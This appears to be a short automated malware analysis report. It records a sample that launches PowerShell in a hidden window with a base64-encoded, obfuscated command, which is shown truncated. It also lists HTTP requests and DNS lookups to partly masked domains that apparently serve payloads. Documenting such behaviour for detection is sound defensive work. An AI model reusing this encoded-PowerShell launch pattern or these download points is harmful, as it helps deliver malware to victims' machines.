Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAGkAYQB6AHIAdQBzAG4AYQB1AHEAdQBnAGUAZQBkAD0AJwB4AG8AYQBxAHUAcQB1AGEAaQBkAHcAaQBvAGoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAEUAYwBVAGAAUgBgAG...
Network activity
TCP
HTTP GET requests
- http://xr###iana.com/cgi-bin/y_j_ue/
- http://be#####ommunicatie.nl/cgi-bin/tge_1h4_hvgq/
- http://la###erg.com/cgi-bin/6s49_wr27h_24k0nel/
- http://at####rbrasilia.com/site/xt_8d_o1mo/
UDP
- DNS ASK la###nebohn.com
- DNS ASK xr###iana.com
- DNS ASK be#####ommunicatie.nl
- DNS ASK li###din.com
- DNS ASK la###erg.com
- DNS ASK at####rbrasilia.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAGkAYQB6AHIAdQBzAG4AYQB1AHEAdQBnAGUAZQBkAD0AJwB4AG8AYQBxAHUAcQB1AGEAaQBkAHcAaQBvAGoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAEUAYwBVAGAAUgBgAG...' (with hidden window)
